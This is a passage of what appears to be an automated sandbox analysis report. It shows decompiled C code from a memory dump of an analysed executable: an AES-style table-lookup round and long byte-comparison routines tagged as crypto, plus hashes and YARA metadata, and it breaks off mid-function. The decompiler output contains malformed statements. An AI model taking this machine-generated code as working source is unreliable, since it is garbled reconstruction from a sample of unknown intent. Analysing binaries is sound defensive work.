					_t509 = _v8 ^  *(0x457c50 + (_t406 & 0x000000ff) * 4);
					_v8 = _t509;
					_v8 = _t509 ^ _t513[6];
					_t485 =  *(0x457050 + (_t481 >> 0x18) * 4) ^  *(0x457850 + (_t406 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_t373 >> 0x00000010 & 0x000000ff) * 4);
					_t510 = _v36;
					_t258 = _v12 & 0x000000ff;
					while(1) {
						_t487 = _t485 ^  *(0x457c50 + _t258 * 4) ^ _t513[7];
						_t514 =  &(_t513[8]);
						_v16 =  &(_t513[8]);
						_v12 = _t485 ^  *(0x457c50 + _t258 * 4) ^ _t513[7];
						_t510 = _t510 - 1;
						if(_t510 == 0) {
							break;
						}
						_t515 = _v8;
						_t488 = _v24;
						_v28 =  *(0x457850 + (_t515 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_t488 >> 0x18) * 4) ^  *(0x457c50 + (_v12 & 0x000000ff) * 4) ^  *_v16;
						_v32 =  *(0x457850 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_t515 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_v20 >> 0x18) * 4) ^  *(0x457c50 + (_t488 & 0x000000ff) * 4) ^  *(_v16 + 4);
						_v12 = _v12 >> 0x18;
						_t516 = _v16;
						_t422 = _t488;
						_t489 = _v20;
						_t379 =  *(0x457450 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_t515 >> 0x18) * 4) ^  *(0x457850 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457c50 + (_t489 & 0x000000ff) * 4) ^  *(_t516 + 8);
						_t496 =  *(0x457050 + _v12 * 4) ^  *(0x457850 + (_t489 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457c50 + (_v8 & 0x000000ff) * 4) ^  *(_t516 + 0xc);
						_v24 =  *(0x457850 + (_t379 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_v32 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_v28 >> 0x18) * 4) ^  *(0x457c50 + (_t496 & 0x000000ff) * 4) ^  *(_t516 + 0x10);
						_v20 =  *(0x457850 + (_t496 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_t379 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_v32 >> 0x18) * 4) ^  *(0x457c50 + (_v28 & 0x000000ff) * 4) ^  *(_t516 + 0x14);
						_v8 =  *(0x457450 + (_t496 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x457050 + (_t379 >> 0x18) * 4);
						_v8 = _v8 ^  *(0x457850 + (_v28 >> 0x00000008 & 0x000000ff) * 4);
						_t440 = _v32;
						_t518 = _v8 ^  *(0x457c50 + (_t440 & 0x000000ff) * 4);
						_v8 = _t518;
						_t513 = _v16;
						_v8 = _t518 ^ _t513[6];
						_t485 =  *(0x457050 + (_t496 >> 0x18) * 4) ^  *(0x457850 + (_t440 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x457450 + (_v28 >> 0x00000010 & 0x000000ff) * 4);
						_t258 = _t379 & 0x000000ff;
					}
					_t338 = E0041BA5E( *(0x457c50 + (_v8 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457050 + (_t487 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x457850 + (_v20 >> 0x18) * 4) & 0xff000000 ^  *(0x457450 + (_v24 & 0x000000ff) * 4) & 0x000000ff ^ _t514[1]);
					_t347 = E0041BA5E( *(0x457850 + (_v8 >> 0x18) * 4) & 0xff000000 ^  *(0x457c50 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457050 + (_v24 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x457450 + (_v20 & 0x000000ff) * 4) & 0x000000ff ^ _t514[2]);
					_t356 = E0041BA5E( *(0x457850 + (_v12 >> 0x18) * 4) & 0xff000000 ^  *(0x457c50 + (_v24 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457050 + (_v20 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x457450 + (_v8 & 0x000000ff) * 4) & 0x000000ff ^ _t514[3]);
					_t369 = E0041BA5E( *(0x457050 + (_v8 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(0x457c50 + (_v20 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(0x457850 + (_v24 >> 0x18) * 4) & 0xff000000 ^  *(0x457450 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_v16);
					_t478 = _a4;
					 *((intOrPtr*)(_t478 + 4)) = _t338;
					 *_t478 = _t369;
					 *((intOrPtr*)(_t478 + 8)) = _t347;
					 *((intOrPtr*)(_t478 + 0xc)) = _t356;
					return _t369;
				}
				return _t222;
			}






































                                            0x0041bb96
                                            0x0041bb99
                                            0x0041bba1
                                            0x0041bba3
                                            0x0041bba9
                                            0x0041bbc6
                                            0x0041bbd4
                                            0x0041bbe1
                                            0x0041bbe4
                                            0x0041bbed
                                            0x0041bbf2
                                            0x0041bbf5
                                            0x0041bc0f
                                            0x0041bc39
                                            0x0041bc77
                                            0x0041bc90
                                            0x0041bcac
                                            0x0041bcaf
                                            0x0041bcbb
                                            0x0041bcc4
                                            0x0041bcca
                                            0x0041bcdd
                                            0x0041bce7
                                            0x0041bcea
                                            0x0041bee9
                                            0x0041bef0
                                            0x0041bef3
                                            0x0041bef6
                                            0x0041bef9
                                            0x0041befc
                                            0x0041beff
                                            0x00000000
                                            0x00000000
                                            0x0041bcf2
                                            0x0041bd0d
                                            0x0041bd3b
                                            0x0041bd7d
                                            0x0041bd82
                                            0x0041bd90
                                            0x0041bd9a
                                            0x0041bd9c
                                            0x0041bdbe
                                            0x0041bdee
                                            0x0041be2a
                                            0x0041be72
                                            0x0041be8b
                                            0x0041bea8
                                            0x0041beab
                                            0x0041beb7
                                            0x0041bebe
                                            0x0041bec3
                                            0x0041bec9
                                            0x0041bedf
                                            0x0041bee6
                                            0x0041bee6
                                            0x0041bf5a
                                            0x0041bfb2
                                            0x0041c00e
                                            0x0041c06c
                                            0x0041c071
                                            0x0041c074
                                            0x0041c077
                                            0x0041c079
                                            0x0041c07c
                                            0x00000000
                                            0x0041c07f
                                            0x0041c085

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0ec16b09b4914925347c3750e85ef214cc58a5ea11e8c6b4f17f70509912941
                                            • Instruction ID: d45a2ac0bf59e083e718a78e86303cb238850e465b007df30c818fe72219e904
                                            • Opcode Fuzzy Hash: f0ec16b09b4914925347c3750e85ef214cc58a5ea11e8c6b4f17f70509912941
                                            • Instruction Fuzzy Hash: 02E15B34A242188FCB08DF6DE89197EB7F1EB4A303745417EE542D7392CA35EA11DB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042E10C, Relevance: .3, Instructions: 341COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0042E10C(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                            0x0042e10c
                                            0x0042e10c
                                            0x0042e112
                                            0x0042e19a
                                            0x0042e19c
                                            0x0042e19e
                                            0x00000000
                                            0x00000000
                                            0x0042e1a4
                                            0x0042e1aa
                                            0x0042e231
                                            0x0042e233
                                            0x0042e235
                                            0x00000000
                                            0x00000000
                                            0x0042e23b
                                            0x0042e241
                                            0x0042e2c8
                                            0x0042e2ca
                                            0x0042e2cc
                                            0x00000000
                                            0x00000000
                                            0x0042e2d2
                                            0x0042e2d8
                                            0x0042e35f
                                            0x0042e361
                                            0x0042e363
                                            0x00000000
                                            0x00000000
                                            0x0042e36f
                                            0x0042e3f7
                                            0x0042e3f9
                                            0x0042e3fb
                                            0x00000000
                                            0x00000000
                                            0x0042e401
                                            0x0042e407
                                            0x0042e48e
                                            0x0042e490
                                            0x0042e492
                                            0x00000000
                                            0x00000000
                                            0x0042e498
                                            0x0042e49e
                                            0x0042e525
                                            0x0042e527
                                            0x0042e529
                                            0x00000000
                                            0x00000000
                                            0x0042e537
                                            0x0042e539
                                            0x0042e551
                                            0x0042e559
                                            0x0042e55b
                                            0x0042dcb4
                                            0x0042dcbc
                                            0x0042dcbe
                                            0x0042dccb
                                            0x0042dccb
                                            0x00000000
                                            0x0042dcbe
                                            0x0042e568
                                            0x0042dcae
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042dcae
                                            0x0042e542
                                            0x0042e54b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e54b
                                            0x0042e4ab
                                            0x0042e4ad
                                            0x0042e4c5
                                            0x0042e4cd
                                            0x0042e4cf
                                            0x0042e4e7
                                            0x0042e4ef
                                            0x0042e4f1
                                            0x0042e509
                                            0x0042e511
                                            0x0042e513
                                            0x0042e51c
                                            0x0042e51c
                                            0x00000000
                                            0x0042e513
                                            0x0042e4fa
                                            0x0042e503
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e503
                                            0x0042e4d8
                                            0x0042e4e1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e4e1
                                            0x0042e4b6
                                            0x0042e4bf
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e4bf
                                            0x0042e414
                                            0x0042e416
                                            0x0042e42e
                                            0x0042e436
                                            0x0042e438
                                            0x0042e450
                                            0x0042e458
                                            0x0042e45a
                                            0x0042e472
                                            0x0042e47a
                                            0x0042e47c
                                            0x0042e485
                                            0x0042e485
                                            0x00000000
                                            0x0042e47c
                                            0x0042e463
                                            0x0042e46c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e46c
                                            0x0042e441
                                            0x0042e44a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e44a
                                            0x0042e41f
                                            0x0042e428
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e428
                                            0x0042e37d
                                            0x0042e37f
                                            0x0042e397
                                            0x0042e39f
                                            0x0042e3a1
                                            0x0042e3b9
                                            0x0042e3c1
                                            0x0042e3c3
                                            0x0042e3db
                                            0x0042e3e3
                                            0x0042e3e5
                                            0x0042e3ee
                                            0x0042e3ee
                                            0x00000000
                                            0x0042e3e5
                                            0x0042e3cc
                                            0x0042e3d5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e3d5
                                            0x0042e3aa
                                            0x0042e3b3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e3b3
                                            0x0042e388
                                            0x0042e391
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e391
                                            0x0042e2e5
                                            0x0042e2e7
                                            0x0042e2ff
                                            0x0042e307
                                            0x0042e309
                                            0x0042e321
                                            0x0042e329
                                            0x0042e32b
                                            0x0042e343
                                            0x0042e34b
                                            0x0042e34d
                                            0x0042e356
                                            0x0042e356
                                            0x00000000
                                            0x0042e34d
                                            0x0042e334
                                            0x0042e33d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e33d
                                            0x0042e312
                                            0x0042e31b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e31b
                                            0x0042e2f0
                                            0x0042e2f9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e2f9
                                            0x0042e24e
                                            0x0042e250
                                            0x0042e268
                                            0x0042e270
                                            0x0042e272
                                            0x0042e28a
                                            0x0042e292
                                            0x0042e294
                                            0x0042e2ac
                                            0x0042e2b4
                                            0x0042e2b6
                                            0x0042e2bf
                                            0x0042e2bf
                                            0x00000000
                                            0x0042e2b6
                                            0x0042e29d
                                            0x0042e2a6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e2a6
                                            0x0042e27b
                                            0x0042e284
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e284
                                            0x0042e259
                                            0x0042e262
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e262
                                            0x0042e1b7
                                            0x0042e1b9
                                            0x0042e1d1
                                            0x0042e1d9
                                            0x0042e1db
                                            0x0042e1f3
                                            0x0042e1fb
                                            0x0042e1fd
                                            0x0042e215
                                            0x0042e21d
                                            0x0042e21f
                                            0x0042e228
                                            0x0042e228
                                            0x00000000
                                            0x0042e21f
                                            0x0042e206
                                            0x0042e20f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e20f
                                            0x0042e1e4
                                            0x0042e1ed
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e1ed
                                            0x0042e1c2
                                            0x0042e1cb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e118
                                            0x0042e11c
                                            0x0042e120
                                            0x0042e122
                                            0x0042e13a
                                            0x0042e13a
                                            0x0042e142
                                            0x0042e144
                                            0x0042e15c
                                            0x0042e15c
                                            0x0042e164
                                            0x0042e166
                                            0x0042e17e
                                            0x0042e17e
                                            0x0042e186
                                            0x0042e188
                                            0x0042e191
                                            0x0042e191
                                            0x00000000
                                            0x0042e188
                                            0x0042e16c
                                            0x0042e16f
                                            0x0042e178
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e178
                                            0x0042e14a
                                            0x0042e14d
                                            0x0042e156
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e156
                                            0x0042e128
                                            0x0042e12b
                                            0x0042e134
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0042e134
                                            0x0042d89a
                                            0x0042d89a
                                            0x0042e68b

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction ID: e79a5f0340d4689e04f131b3a2827736984e11c57242efe1ebd2e0d948024b73
                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                            • Instruction Fuzzy Hash: 9BC1853270917309DF2D463AD43407FBBA19AA27B135A576ED4F3CB2C8EE28C525D528
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0042D8A2, Relevance: .3, Instructions: 331COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0042D8A2(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
